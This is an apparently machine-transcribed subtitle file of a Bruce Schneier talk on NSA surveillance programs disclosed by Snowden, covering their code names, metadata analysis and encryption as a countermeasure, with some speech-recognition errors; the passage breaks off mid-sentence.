1 00:00:00,000 --> 00:00:09,000 Welcome to this talk. This is Bruce Schneier telling us about the NSA, their capabilities and countermeasures that we can have against them. Thank you very much. 2 00:00:09,000 --> 00:00:19,000 Thank you. 3 00:00:19,000 --> 00:00:31,000 Good afternoon. Thanks for coming. Thanks for listening to this. To me, the coolest thing about all the NSA disclosures in the past six months have been the code names. 4 00:00:31,000 --> 00:00:39,000 I think code names are pretty neat. There are not enough code names in our lives. I think we need to learn how to use code names better. 5 00:00:39,000 --> 00:00:45,000 I'm going to list a few of the code names. First code name I'm going to talk about is muscular. 6 00:00:45,000 --> 00:00:55,000 The code name is the NSA top secret program to collect Google and user data by e-dropping on the trunk lines between the data centers. 7 00:00:55,000 --> 00:01:04,000 This is probably down to the help of level three communications. Level three was Google's provider. We know level three's code and NSA code name is little. 8 00:01:04,000 --> 00:01:11,000 I think it's a general rule that if your data supplier has an NSA code name, you're probably pretty screwed. 9 00:01:11,000 --> 00:01:22,000 This is actually different from the NSA's program to collect Google and Yahoo user data by e-dropping on the links between the browser and the web server. 10 00:01:22,000 --> 00:01:30,000 We don't know the code name for that. But that was probably done with the help of AT&T and other telecom companies. 11 00:01:30,000 --> 00:01:42,000 We know AT&T's code name for some of this is prism. There's a lot of code names associated with the telecos storm brew is one. There's a bunch there. 12 00:01:42,000 --> 00:01:55,000 This is different from prism. Prism is the code name for the top secret NSA program to collect Google and Yahoo user data by asking the companies directly. 13 00:01:55,000 --> 00:02:03,000 That's one set. Another really important code name which people here should learn about is quantum. 14 00:02:03,000 --> 00:02:13,000 All those other code names have to do with passive eavesdropping. Quantum is the NSA program to it in actively inject packets into the backbone. 15 00:02:13,000 --> 00:02:21,000 So there are these massive computers. They have code names like tumult and turbulence and turmoil. 16 00:02:21,000 --> 00:02:28,000 Well, tumult also allows data to go back in as opposed to just being extracted. 17 00:02:28,000 --> 00:02:38,000 There's a lot of different code names associated with quantum. This quantum insert, which is their packet injection attack tool. 18 00:02:38,000 --> 00:02:48,000 We're pretty sure this includes three or two redirect injection and DNS packet injection. Possibly also TCP rejects. 19 00:02:48,000 --> 00:03:00,000 There's quantum cookie where it shall now is the NSA to inject a packet in a stream going back to a user that forces them to the divulge of cookies and uses that to identify users. 20 00:03:00,000 --> 00:03:05,000 You see, maybe browsing anonymously, someone poxets you and suddenly your divulge in your Facebook cookie. 21 00:03:05,000 --> 00:03:09,000 NSA keeps a database of cookies so they know who people are. 22 00:03:09,000 --> 00:03:22,000 Also something called quantum hand. We saw that in the presentation about the anonymity service tour. 23 00:03:22,000 --> 00:03:35,000 The presentation on tour, we don't know what quantum hand does. Nicholas, we respectfully said it's a command and control system for NSA malware, which actually think about as pretty cool use of a of an injection system. 24 00:03:35,000 --> 00:03:46,000 There's a bunch of other quantum quantum programs. I think one of the things we can do, usually, is think about what a system like that like this would look like how it would work. 25 00:03:46,000 --> 00:03:50,000 What sorts of things it could do. That will help us figure out how to design around it. 26 00:03:50,000 --> 00:03:57,000 What design against it. And it's probably true that it does the things we think it does. 27 00:03:57,000 --> 00:04:04,000 Another code name that is related is Fox Acid. Fox Acid is actually one of the coolest code names that got. 28 00:04:04,000 --> 00:04:11,000 Fox Acid is what they call an exploit orchestrator. Think of MetaSplite with a budget. 29 00:04:11,000 --> 00:04:24,000 These are computers that sit on the network. When something like quantum forces you to redirect to that computer, it knows who you are because it's been told offline. 30 00:04:24,000 --> 00:04:31,000 And it sends you different malware. The malware has all sorts of code names, a validator, a united rake. 31 00:04:31,000 --> 00:04:36,000 My vote for NSA stupidest code name, egotistical giraffe. 32 00:04:36,000 --> 00:04:46,000 Actually did not make that up. The particular exploit that you are served is determined by a program that is codenamed. 33 00:04:46,000 --> 00:04:48,000 Ferret Cannon. 34 00:04:48,000 --> 00:04:53,000 Validator happens to be the default exploit that that's run against you. 35 00:04:53,000 --> 00:04:58,000 I assume it's a windows. And after your own, they're various implants. 36 00:04:58,000 --> 00:05:06,000 We've seen a bunch of these. We saw some of these from that book of Tao implants. 37 00:05:06,000 --> 00:05:13,000 We saw some from a limon document that was released a couple months ago. 38 00:05:13,000 --> 00:05:19,000 There are a lot of really cool implants. Black hot mineralized, fragrant highlands. 39 00:05:19,000 --> 00:05:23,000 Some of them are designed to jump air gaps. 40 00:05:23,000 --> 00:05:30,000 Some of them are designed to pull what's on the screen. Some of them are designed to pull passwords or find other things. 41 00:05:30,000 --> 00:05:42,000 There are exploit design to exploit printers. Lots of surveillance tools, co-traveler, evil olive is an IP location database. 42 00:05:42,000 --> 00:05:47,000 Lots of analysis tools. We've seen marina. We've seen pinway. We've seen mainway. 43 00:05:47,000 --> 00:05:54,000 Bullrun. Bullruns. The codenamed. Then I say program to basically subvert internet products and services. 44 00:05:54,000 --> 00:05:59,000 There's a lot here. I don't think anyone's done the full codenamed glossary. 45 00:05:59,000 --> 00:06:04,000 Probably worth doing. There are certainly hundreds out by now. 46 00:06:04,000 --> 00:06:08,000 The documents are just littered with codenames. Some of them are actually done with even though what they mean. 47 00:06:08,000 --> 00:06:11,000 We just see them in passing. 48 00:06:11,000 --> 00:06:17,000 Some of the pages from that tau implant catalog are full of codenames. 49 00:06:17,000 --> 00:06:24,000 The meta moral here. The meta story is keeping coming. 50 00:06:24,000 --> 00:06:30,000 We learned about the text message database. 51 00:06:30,000 --> 00:06:35,000 The collection of text messages that's going on. 52 00:06:35,000 --> 00:06:42,000 The meta story is the NSA has turned the internet into a giant surveillance platform. 53 00:06:42,000 --> 00:06:48,000 What's important is that it's robust. It's robust politically. 54 00:06:48,000 --> 00:06:59,000 I started this presentation by naming three different programs to collect Google and Yahoo email user data. 55 00:06:59,000 --> 00:07:09,000 These are three different technical accesses. We're lying on agreements or at least cooperation with three different companies. 56 00:07:09,000 --> 00:07:14,000 We're lying on three different legal justifications. 57 00:07:14,000 --> 00:07:20,000 That same thing is true. I think for cell phone data, for internet data, for everything else. 58 00:07:20,000 --> 00:07:23,000 There's a lot of redundancy in the system. 59 00:07:23,000 --> 00:07:27,000 We think about solutions is important to realize. 60 00:07:27,000 --> 00:07:32,000 That point solutions are hard because these are in point problems. 61 00:07:32,000 --> 00:07:35,000 The NSA continues to lie about us capabilities. 62 00:07:35,000 --> 00:07:39,000 We started learning the NSA code book for lying. 63 00:07:39,000 --> 00:07:49,000 We started learning their interpretations of words like collect, incidentally, target, or directed. 64 00:07:49,000 --> 00:07:53,000 They say things like we don't collect data. 65 00:07:53,000 --> 00:07:59,000 We don't count it as collecting until we actually look at it. 66 00:07:59,000 --> 00:08:09,000 We don't directly target Americans. 67 00:08:09,000 --> 00:08:15,000 We get them but not on purpose. 68 00:08:15,000 --> 00:08:23,000 We know they cloak programs and multiple code names to hide their extent and capabilities. 69 00:08:23,000 --> 00:08:27,000 The same program with different code names. 70 00:08:27,000 --> 00:08:33,000 Any time you hear something the NSA saying, we don't do this under this program or under this authority. 71 00:08:33,000 --> 00:08:39,000 The odds are 100% are doing it in some other program and under authority. 72 00:08:39,000 --> 00:08:43,000 Another thing is not coming out. 73 00:08:43,000 --> 00:08:47,000 There's a lot of sharing between different organizations. 74 00:08:47,000 --> 00:08:51,000 The NSA, CIA, FBI, DIA. 75 00:08:51,000 --> 00:08:53,000 We know some of this. 76 00:08:53,000 --> 00:08:56,000 We knew from a really story. 77 00:08:56,000 --> 00:09:03,000 I had a slide from NSA document that talked about the NSA sharing data with DIA and it struck them to live. 78 00:09:03,000 --> 00:09:07,000 We came from in court. 79 00:09:07,000 --> 00:09:11,000 I think there's a lot more sharing going on with the NSA and FBI. 80 00:09:11,000 --> 00:09:13,000 Not just a data but of technologies. 81 00:09:13,000 --> 00:09:21,000 We know a lot about the FBI's technologies for e-dropping on cell phone calls. 82 00:09:21,000 --> 00:09:25,000 Some of those fake cell phone tower technologies. 83 00:09:25,000 --> 00:09:29,000 We saw the same things in the NSA TIO toolkit. 84 00:09:29,000 --> 00:09:33,000 It's improbable to me that these are being developed independently. 85 00:09:33,000 --> 00:09:37,000 That one person would want to agey develops them and they get shared. 86 00:09:37,000 --> 00:09:41,000 I think also legal coverage shared. 87 00:09:41,000 --> 00:09:45,000 There are companies that will say we don't cooperate with the NSA. 88 00:09:45,000 --> 00:09:47,000 I think largely they're correct. 89 00:09:47,000 --> 00:09:49,000 They cooperate with the FBI who's the front for the NSA. 90 00:09:49,000 --> 00:09:51,000 For whatever program is being run. 91 00:09:51,000 --> 00:09:57,000 So I think there's a lot more moving around between agencies. 92 00:09:57,000 --> 00:09:58,000 NSA's mission. 93 00:09:58,000 --> 00:09:59,000 We know what it is. 94 00:09:59,000 --> 00:10:02,000 We can see it in the documents. 95 00:10:02,000 --> 00:10:06,000 Glenn Greenwald gave a talk at CCC. 96 00:10:06,000 --> 00:10:12,000 He talked about the slogans collected all, know it all, exploited all. 97 00:10:12,000 --> 00:10:16,000 These things permeate documents. 98 00:10:16,000 --> 00:10:23,000 You can see it in the NSA's almost a methodical moving through every communications technology. 99 00:10:23,000 --> 00:10:28,000 Trying to capture data including chat rooms and virtual worlds. 100 00:10:28,000 --> 00:10:30,000 Which sounds ridiculous. 101 00:10:30,000 --> 00:10:33,000 But if you're thinking in terms of we have to collect everything. 102 00:10:33,000 --> 00:10:34,000 It makes perfect sense. 103 00:10:34,000 --> 00:10:37,000 Why would you leave that? 104 00:10:37,000 --> 00:10:39,000 Why would you leave that channel? 105 00:10:39,000 --> 00:10:41,000 Unused drop-down. 106 00:10:41,000 --> 00:10:45,000 To understand this mission, you really have to understand the NSA's history. 107 00:10:45,000 --> 00:10:48,000 The NSA is born out of the Cold War. 108 00:10:49,000 --> 00:10:54,000 When we were singularly interested in everything happening in the Soviet Union. 109 00:10:54,000 --> 00:10:57,000 And it was almost a voyeuristic interest. 110 00:10:57,000 --> 00:10:59,000 We had to know everything. 111 00:10:59,000 --> 00:11:06,000 And that collected all mentality was focused on the Soviet Union, on the Warsaw Pact, on China, 112 00:11:06,000 --> 00:11:11,000 on the countries that we were eavesdropping on. 113 00:11:11,000 --> 00:11:14,000 We collected enormous amount of data. 114 00:11:14,000 --> 00:11:16,000 There's a lot less data than. 115 00:11:16,000 --> 00:11:19,000 And it's all made some sense. 116 00:11:19,000 --> 00:11:22,000 So you had certain trunk lines you needed to listen on them. 117 00:11:22,000 --> 00:11:24,000 And you get a lot of data. 118 00:11:24,000 --> 00:11:26,000 Some of it's useful, some of it's not. 119 00:11:26,000 --> 00:11:30,000 Tactical data is much easier deal with the strategic data. 120 00:11:30,000 --> 00:11:35,000 You have a much easier time figuring out the capabilities of the new Soviet tank than you do 121 00:11:35,000 --> 00:11:37,000 particularly the full of communism. 122 00:11:37,000 --> 00:11:40,000 Social trends are hard. 123 00:11:40,000 --> 00:11:42,000 That's sort of ubiquitous surveillance. 124 00:11:42,000 --> 00:11:46,000 That mentality really should have died with the Cold War. 125 00:11:46,000 --> 00:11:51,000 But it got a newly-sum life with the terrorist attacks of September 11th. 126 00:11:51,000 --> 00:11:56,000 Because the intelligence community was handed in impossible mission, right? 127 00:11:56,000 --> 00:11:57,000 Never again. 128 00:11:57,000 --> 00:11:59,000 Those were their orders. 129 00:11:59,000 --> 00:12:00,000 Right? 130 00:12:00,000 --> 00:12:02,000 Never again is ridiculous. 131 00:12:02,000 --> 00:12:04,000 You can't actually do it. 132 00:12:04,000 --> 00:12:08,000 But if you think about it, if you get that kind of 133 00:12:08,000 --> 00:12:13,000 of a quick-sodic goal of making sure something never happens, 134 00:12:13,000 --> 00:12:19,000 the only way you could possibly achieve that is to know everything that does happen. 135 00:12:19,000 --> 00:12:20,000 Right? 136 00:12:20,000 --> 00:12:26,000 So never again forces you into know everything. 137 00:12:26,000 --> 00:12:34,000 And that mission was aided really by the natural trends of information technology. 138 00:12:34,000 --> 00:12:38,000 And I think this is another important thread we really have to understand. 139 00:12:38,000 --> 00:12:43,000 Fundamentally, data is a byproduct of the Information Society. 140 00:12:43,000 --> 00:12:47,000 Everything we do on computers creates a transaction record. 141 00:12:47,000 --> 00:12:53,000 Data is a byproduct of our Information Society's socialization. 142 00:12:53,000 --> 00:12:59,000 Every time we interact with people using computers, it creates a transaction record. 143 00:12:59,000 --> 00:13:02,000 Usually of the actual conversation, right? 144 00:13:02,000 --> 00:13:04,000 Voices the exception. 145 00:13:04,000 --> 00:13:09,000 But a lot more of our conversations happen not in recordable form, 146 00:13:09,000 --> 00:13:11,000 but in recorded form. 147 00:13:11,000 --> 00:13:18,000 The act of having a conversation is in a text session means it is recorded. 148 00:13:18,000 --> 00:13:24,000 This all this data is being increasingly stored, increasingly search, increasingly used. 149 00:13:24,000 --> 00:13:26,000 And this is just Moore's law. 150 00:13:26,000 --> 00:13:29,000 It's a very large drop to free data, processing drops to free. 151 00:13:29,000 --> 00:13:34,000 It is way easier to save everything that is to figure out what to save. 152 00:13:34,000 --> 00:13:35,000 You all know this is true. 153 00:13:35,000 --> 00:13:38,000 That's how you deal with your email. 154 00:13:38,000 --> 00:13:39,000 Right? 155 00:13:39,000 --> 00:13:44,000 I remember, because I'm old enough to remember, the moment I used to sort my email. 156 00:13:44,000 --> 00:13:46,000 You'd throw away what you need. 157 00:13:46,000 --> 00:13:49,000 You'd put in different folders, depending on who you're talking to. 158 00:13:49,000 --> 00:13:51,000 You'd be like, I'm top-eye-covey-assorted. 159 00:13:51,000 --> 00:13:54,000 But there's a year I stopped doing that. 160 00:13:54,000 --> 00:13:55,000 Everything in one folder. 161 00:13:55,000 --> 00:13:58,000 And that was the year that search became cheaper than sort. 162 00:13:58,000 --> 00:14:00,000 And it made no sense. 163 00:14:00,000 --> 00:14:03,000 And that's the world we're in. 164 00:14:03,000 --> 00:14:04,000 Right? 165 00:14:04,000 --> 00:14:08,000 And the effects is that we're all leaving digital footprints throughout our lives. 166 00:14:08,000 --> 00:14:15,000 Cloud computing just exacerbates this, because our data is just moving away from our control. 167 00:14:15,000 --> 00:14:18,000 And lots of things become possible now. 168 00:14:18,000 --> 00:14:21,000 The notion of wholesale surveillance. 169 00:14:21,000 --> 00:14:27,000 It's sort of fascinating that the NSA is putting everyone in the planet under surveillance. 170 00:14:27,000 --> 00:14:30,000 But they're doing that because we're all carrying cell phones. 171 00:14:30,000 --> 00:14:36,000 Where the cell phone system by definition puts us all under surveillance. 172 00:14:36,000 --> 00:14:39,000 Just like email does. 173 00:14:39,000 --> 00:14:43,000 Just like, I don't know, ATM machines do. 174 00:14:43,000 --> 00:14:47,000 And all those things produce data records. 175 00:14:47,000 --> 00:14:51,000 So wholesale surveillance, surveillance backwards in time. 176 00:14:51,000 --> 00:14:53,000 The death of a femoral conversation. 177 00:14:53,000 --> 00:14:55,000 We're not really there yet. 178 00:14:55,000 --> 00:14:57,000 I mean, it's almost too true for politicians. 179 00:14:57,000 --> 00:14:59,000 We're now living in a world, listening to US. 180 00:14:59,000 --> 00:15:05,000 We're pretty much every politician has someone from the opposing party following them constantly with a video camera. 181 00:15:05,000 --> 00:15:07,000 And looking for a gaff. 182 00:15:07,000 --> 00:15:08,000 Right? 183 00:15:08,000 --> 00:15:14,000 That kind of surveillance will become the norm, everywhere within a few years. 184 00:15:14,000 --> 00:15:17,000 Maybe it's Google Glass, maybe it's something else. 185 00:15:17,000 --> 00:15:24,000 But a femoral is going to disappear because the won't be the ability to have those conversations. 186 00:15:24,000 --> 00:15:26,000 Or systems that never forget. 187 00:15:26,000 --> 00:15:29,000 I think this is probably the biggest change that we're not ready for. 188 00:15:29,000 --> 00:15:35,000 I think a lot of our societal, a lot of societal lubricants in the fact that we have lousy memories. 189 00:15:35,000 --> 00:15:40,000 You know, when I can go home and replay and argue with my wife from two years, 190 00:15:40,000 --> 00:15:44,000 going to prove I'm right, I'm not convinced I'm better off. 191 00:15:44,000 --> 00:15:48,000 But that's going to be possible. 192 00:15:48,000 --> 00:15:49,000 Right? 193 00:15:49,000 --> 00:15:51,000 The result here is a public private surveillance partnership. 194 00:15:51,000 --> 00:15:55,000 There's a basic alliance of government and corporate interests. 195 00:15:55,000 --> 00:15:59,000 An NSA surveillance largely piggybacked from corporate capabilities. 196 00:15:59,000 --> 00:16:01,000 Already mentioned cell phones. 197 00:16:01,000 --> 00:16:04,000 I've mentioned internet cookies. 198 00:16:04,000 --> 00:16:07,000 All of those things happen everywhere. 199 00:16:07,000 --> 00:16:16,000 There's an NSA protocol happy foot that tries to geolocate cell phones through apps 200 00:16:16,000 --> 00:16:18,000 that transmit location. 201 00:16:18,000 --> 00:16:25,000 Goly's separate from the NSA program that tries to geolocate cell phones to the cell towers. 202 00:16:25,000 --> 00:16:26,000 Right? 203 00:16:26,000 --> 00:16:29,000 There's overt and covert collection. 204 00:16:29,000 --> 00:16:31,000 I mentioned Google in level three. 205 00:16:31,000 --> 00:16:33,000 And over collections of variety of forms. 206 00:16:33,000 --> 00:16:35,000 Right? We see cooperation. 207 00:16:35,000 --> 00:16:36,000 You know, ask nicely. 208 00:16:36,000 --> 00:16:38,000 We see bribery. 209 00:16:38,000 --> 00:16:39,000 We see threats. 210 00:16:39,000 --> 00:16:41,000 We see legal compulsion. 211 00:16:41,000 --> 00:16:46,000 But fundamentally surveillance is the business model of the internet. 212 00:16:46,000 --> 00:16:46,000 213 00:16:46,000 --> 00:16:49,000 We build systems that spy on people in exchange for services. 214 00:16:49,000 --> 00:16:52,000 That's the way a lot of the networks. 215 00:16:52,000 --> 00:16:57,000 And the NSA is happy to piggyback on a lot of those capabilities. 216 00:16:58,000 --> 00:17:01,000 The result is the golden age of surveillance. 217 00:17:01,000 --> 00:17:05,000 I mean, this is the golden age of surveillance. 218 00:17:05,000 --> 00:17:11,000 Even if there wasn't malice because of the way our systems naturally work. 219 00:17:11,000 --> 00:17:12,000 Right? 220 00:17:12,000 --> 00:17:16,000 Yesterday again, President Obama talked about, don't worry. 221 00:17:16,000 --> 00:17:17,000 It's only metadata. 222 00:17:17,000 --> 00:17:18,000 I don't know if you saw the speech. 223 00:17:18,000 --> 00:17:20,000 He said we're not listening in your phone calls. 224 00:17:20,000 --> 00:17:24,000 I'm really getting tired of that metadata equals surveillance. 225 00:17:25,000 --> 00:17:28,000 And an easy thought experiment that will embarrass us out. 226 00:17:28,000 --> 00:17:31,000 Imagine you've hired it to detective to spy on somebody. 227 00:17:31,000 --> 00:17:35,000 And that detective would plant a bug in his office, his home, his car. 228 00:17:35,000 --> 00:17:38,000 And you'd get a report of the conversations he had. 229 00:17:38,000 --> 00:17:40,000 Right? That's what the president says he's not doing. 230 00:17:40,000 --> 00:17:43,000 If you ask that same detective to put that person under surveillance, 231 00:17:43,000 --> 00:17:44,000 you'd get a different report. 232 00:17:44,000 --> 00:17:49,000 Where he went, who he spoke to, what he read, what he purchased, what he looked at. 233 00:17:49,000 --> 00:17:52,000 Right? That's all metadata. 234 00:17:53,000 --> 00:17:56,000 Right? Medadata equals surveillance. 235 00:17:56,000 --> 00:17:58,000 And when you have all this metadata, 236 00:17:58,000 --> 00:18:02,000 Medadata is actually a lot more valuable than the Eavesdropping data. 237 00:18:02,000 --> 00:18:05,000 Because it tells you a lot more about what's going on. 238 00:18:05,000 --> 00:18:11,000 And the NSA has some very sophisticated analysis tools to deal with all of this metadata. 239 00:18:11,000 --> 00:18:18,000 We saw some of them in the Washington Post article on cell phone location data. 240 00:18:19,000 --> 00:18:22,000 We saw some hints at the tools the NSA is using in this database. 241 00:18:22,000 --> 00:18:24,000 And some of them are pretty cool. 242 00:18:24,000 --> 00:18:28,000 They have a program that looks for phones, 243 00:18:28,000 --> 00:18:32,000 called moving towards each other, that turn themselves off. 244 00:18:32,000 --> 00:18:36,000 And then turn themselves on again about an hour later moving away from each other. 245 00:18:36,000 --> 00:18:38,000 Or they look for secret meanings. 246 00:18:38,000 --> 00:18:40,000 It's kind of neat. 247 00:18:40,000 --> 00:18:47,000 They have the cell phone data of US agents, 248 00:18:47,000 --> 00:18:49,000 which they track. 249 00:18:49,000 --> 00:18:55,000 And then they look for cell phones that are or series of cell phones that are basically parallel in the location. 250 00:18:55,000 --> 00:18:59,000 They're looking for tails. 251 00:18:59,000 --> 00:19:01,000 They have a system. 252 00:19:01,000 --> 00:19:03,000 I think they're sure how it works. 253 00:19:03,000 --> 00:19:05,000 But they try to chain together. 254 00:19:05,000 --> 00:19:07,000 Burner phones. 255 00:19:07,000 --> 00:19:08,000 Burner phones are disposable phones. 256 00:19:08,000 --> 00:19:11,000 If you watch the wire, you know what it would be like to burner phone is. 257 00:19:11,000 --> 00:19:15,000 So they're used for a certain amount of time. 258 00:19:15,000 --> 00:19:18,000 But if you're a person who uses a burner phone, if you think about it, 259 00:19:18,000 --> 00:19:20,000 you use one that another that another. 260 00:19:20,000 --> 00:19:25,000 And if I have a database of those short lived anonymous phones. 261 00:19:25,000 --> 00:19:29,000 And I know the location, I know the numbers they're calling, 262 00:19:29,000 --> 00:19:31,000 I can probably do a pretty good job chaining them. 263 00:19:31,000 --> 00:19:34,000 And figure out who the person is. 264 00:19:34,000 --> 00:19:36,000 Even though they're using burner phones. 265 00:19:36,000 --> 00:19:39,000 And that's just three examples from one database. 266 00:19:39,000 --> 00:19:43,000 I mean, you know, think about the text message database, 267 00:19:43,000 --> 00:19:47,000 think about the email metadata database. 268 00:19:47,000 --> 00:19:50,000 Put some of putting them together. 269 00:19:50,000 --> 00:19:54,000 You can get a lot of information. 270 00:19:54,000 --> 00:19:57,000 Something that I think our community knows, 271 00:19:57,000 --> 00:19:59,000 but I often have to say this, especially politically, 272 00:19:59,000 --> 00:20:02,000 that this is really not just about the NSA. 273 00:20:02,000 --> 00:20:05,000 And then she's not even just about the United States. 274 00:20:05,000 --> 00:20:10,000 I mean, the United States spends more on intelligence 275 00:20:10,000 --> 00:20:12,000 than the rest of the world combined. 276 00:20:12,000 --> 00:20:16,000 But this is what any nation state would do. 277 00:20:16,000 --> 00:20:18,000 We're better at it. 278 00:20:18,000 --> 00:20:21,000 We have a very privileged position on the internet, 279 00:20:21,000 --> 00:20:25,000 both in terms of the companies that build and operate the internet. 280 00:20:25,000 --> 00:20:30,000 And the connectivity tends to flow through the US. 281 00:20:30,000 --> 00:20:33,000 But these techniques are all general. 282 00:20:33,000 --> 00:20:38,000 And we know this quantum packet injection is how China runs a great firewall 283 00:20:38,000 --> 00:20:39,000 of China. 284 00:20:39,000 --> 00:20:44,000 And we know other countries do these same things too. 285 00:20:44,000 --> 00:20:47,000 What's happened is the Stodon doc and that's given us 286 00:20:47,000 --> 00:20:51,000 this extraordinary window into the NSA's activities. 287 00:20:51,000 --> 00:20:56,000 And it's just too interesting not to really look at it. 288 00:20:56,000 --> 00:20:58,000 But other countries do this. 289 00:20:58,000 --> 00:21:00,000 And technology spreads. 290 00:21:00,000 --> 00:21:04,000 There's nothing special about these techniques that make them 291 00:21:04,000 --> 00:21:06,000 not usable by others. 292 00:21:06,000 --> 00:21:09,000 Today's secret NSA programs become tomorrow's PhD thesis 293 00:21:09,000 --> 00:21:11,000 of the next day's hacker tools. 294 00:21:11,000 --> 00:21:16,000 So in a lot of ways, the stuff we're seeing at the NSA today 295 00:21:16,000 --> 00:21:20,000 is a three to five year window on the criminals will do. 296 00:21:20,000 --> 00:21:26,000 A lot of those tau tools were embedded pieces of hardware. 297 00:21:26,000 --> 00:21:28,000 We used to subvert systems. 298 00:21:28,000 --> 00:21:31,000 We were already seeing those in point of sale terminals. 299 00:21:31,000 --> 00:21:35,000 Just to look at credit card numbers. 300 00:21:35,000 --> 00:21:37,000 And this is fundamentally the harm. 301 00:21:37,000 --> 00:21:40,000 When you think about the harm, here's where it is. 302 00:21:40,000 --> 00:21:44,000 We have built an internet that is secure for everyone. 303 00:21:44,000 --> 00:21:46,000 We have enabled the penopticon. 304 00:21:46,000 --> 00:21:51,000 We have enabled this ubiquitous surveillance. 305 00:21:51,000 --> 00:21:56,000 We now have a complete loss of trust in the technologies. 306 00:21:56,000 --> 00:21:59,000 Loss of trust in the protocols. 307 00:21:59,000 --> 00:22:03,000 That NSA B-save tool kit is an interesting example. 308 00:22:03,000 --> 00:22:07,000 Here's an area we know that the NSA has influenced 309 00:22:07,000 --> 00:22:11,000 a random number generator in a popular crypto tool kit. 310 00:22:11,000 --> 00:22:13,000 Made it a default. 311 00:22:13,000 --> 00:22:15,000 And spent 10 minutes out to do that. 312 00:22:15,000 --> 00:22:17,000 It's an interesting program. 313 00:22:17,000 --> 00:22:19,000 I think there's largely a failure. 314 00:22:19,000 --> 00:22:23,000 Because we don't hear much about products that have used that. 315 00:22:23,000 --> 00:22:27,000 A lot of people looked at it and said this is a dumb random 316 00:22:27,000 --> 00:22:27,000 317 00:22:27,000 --> 00:22:28,000 We're not going to use it. 318 00:22:28,000 --> 00:22:31,000 We use another one in the standard. 319 00:22:31,000 --> 00:22:33,000 But that's not the only one. 320 00:22:33,000 --> 00:22:37,000 The program didn't stop with that particular subversion. 321 00:22:37,000 --> 00:22:41,000 But the problem is we don't know any others. 322 00:22:41,000 --> 00:22:44,000 Which is an enormous loss of trust. 323 00:22:44,000 --> 00:22:45,000 Who do you trust? 324 00:22:45,000 --> 00:22:47,000 We have no idea. 325 00:22:48,000 --> 00:22:51,000 I wrote an essay where I talked about some of the metrics you might use 326 00:22:51,000 --> 00:22:52,000 to figure out who to trust. 327 00:22:52,000 --> 00:22:54,000 My big US companies bad. 328 00:22:54,000 --> 00:22:56,000 Small open source good. 329 00:22:56,000 --> 00:22:58,000 But we're just really making it up. 330 00:22:58,000 --> 00:22:59,000 We're just trying. 331 00:22:59,000 --> 00:23:01,000 We don't know. 332 00:23:01,000 --> 00:23:04,000 And also it's lost the trust in the institutions. 333 00:23:04,000 --> 00:23:08,000 The internet government model is kind of broke right now. 334 00:23:08,000 --> 00:23:11,000 Because it's really until now, 335 00:23:11,000 --> 00:23:14,000 it's been largely a benign US dictatorship. 336 00:23:14,000 --> 00:23:17,000 Under the general belief that the US is acturing 337 00:23:17,000 --> 00:23:19,000 and vaguely the world's best interests. 338 00:23:19,000 --> 00:23:21,000 And we can just let it be that way. 339 00:23:21,000 --> 00:23:24,000 And that turns out not to be true. 340 00:23:24,000 --> 00:23:27,000 And we have nothing to replace it. 341 00:23:27,000 --> 00:23:30,000 So we're just sort of flopping wrong right now. 342 00:23:30,000 --> 00:23:33,000 I mean, there's a lot of details we don't know. 343 00:23:33,000 --> 00:23:35,000 And I think we'll never know. 344 00:23:35,000 --> 00:23:39,000 There's nothing about cryptography in the documents. 345 00:23:39,000 --> 00:23:41,000 I looked. 346 00:23:42,000 --> 00:23:45,000 These are really all on the second side. 347 00:23:45,000 --> 00:23:48,000 There's not a lot of company names. 348 00:23:48,000 --> 00:23:52,000 That prism slide was a ginormous exception. 349 00:23:52,000 --> 00:23:56,000 Generally all company names are hidden behind code names 350 00:23:56,000 --> 00:23:58,000 and code names are never defined. 351 00:23:58,000 --> 00:24:02,000 This is something called ECI extremely compartment information. 352 00:24:02,000 --> 00:24:05,000 Basically it's not written down. 353 00:24:05,000 --> 00:24:10,000 So we will forever only know companies by code names. 354 00:24:11,000 --> 00:24:14,000 Now we have some in the telco. 355 00:24:14,000 --> 00:24:16,000 Remedy is BT. 356 00:24:16,000 --> 00:24:17,000 There's another one. 357 00:24:17,000 --> 00:24:21,000 We know some of those, but a lot we're just never going to know. 358 00:24:21,000 --> 00:24:24,000 And there'll be a lot of programs we don't know. 359 00:24:24,000 --> 00:24:28,000 I mean, the documents really are just shadows of what's going on. 360 00:24:28,000 --> 00:24:31,000 So it's still going to be a lot, a lot hidden. 361 00:24:31,000 --> 00:24:33,000 But we have to deal with this. 362 00:24:33,000 --> 00:24:36,000 I mean, this is what we have to work with. 363 00:24:36,000 --> 00:24:39,000 We have to work with all of this ignorance into what exactly 364 00:24:39,000 --> 00:24:41,000 has been subverted. 365 00:24:41,000 --> 00:24:44,000 What exactly has been turned. 366 00:24:44,000 --> 00:24:46,000 And we have a choice to make. 367 00:24:46,000 --> 00:24:50,000 As people who design the internet who use the internet. 368 00:24:50,000 --> 00:24:54,000 And it's not a choice and does the NSA spy or not. 369 00:24:54,000 --> 00:24:59,000 It's a choice between an internet that is vulnerable to all attackers 370 00:24:59,000 --> 00:25:02,000 or you know that a secure for all users. 371 00:25:02,000 --> 00:25:04,000 That's our actual choice. 372 00:25:04,000 --> 00:25:08,000 The problem is we have made surveillance to cheap. 373 00:25:08,000 --> 00:25:12,000 And the solution is to make it expensive again. 374 00:25:12,000 --> 00:25:15,000 There's good news, Band is about encryption. 375 00:25:15,000 --> 00:25:18,000 Edward Snowden, in his first interview after he's named 376 00:25:18,000 --> 00:25:20,000 came public, talked about this. 377 00:25:20,000 --> 00:25:23,000 And he said encryption works. 378 00:25:23,000 --> 00:25:28,000 Properly implemented strong crypto systems are one of the few things you can rely on. 379 00:25:28,000 --> 00:25:29,000 We know this is true. 380 00:25:29,000 --> 00:25:31,000 This is the lesson of tour. 381 00:25:31,000 --> 00:25:34,000 The NSA can't break tour and it pisses them off. 382 00:25:34,000 --> 00:25:44,000 This is the NSA program to collect body lists from the browser to web server connection. 383 00:25:44,000 --> 00:25:47,000 They had numbers of the data collected. 384 00:25:47,000 --> 00:25:51,000 They collected about 10 times the data from Yahoo as from Google. 385 00:25:51,000 --> 00:25:55,000 Which makes no sense because Google might have 10 times the users as Yahoo does. 386 00:25:55,000 --> 00:26:00,000 Once you realize that Google is using SSL by default. 387 00:26:00,000 --> 00:26:03,000 And Yahoo isn't that does make sense. 388 00:26:03,000 --> 00:26:06,000 The unacrypted connections are more fruitful. 389 00:26:06,000 --> 00:26:08,000 This is also less of a muscular. 390 00:26:08,000 --> 00:26:11,000 There's a great handwritten back of the napkin slide. 391 00:26:11,000 --> 00:26:18,000 Where the engineers are describing how they get the data from from Google's backbone. 392 00:26:18,000 --> 00:26:22,000 They point to the space where 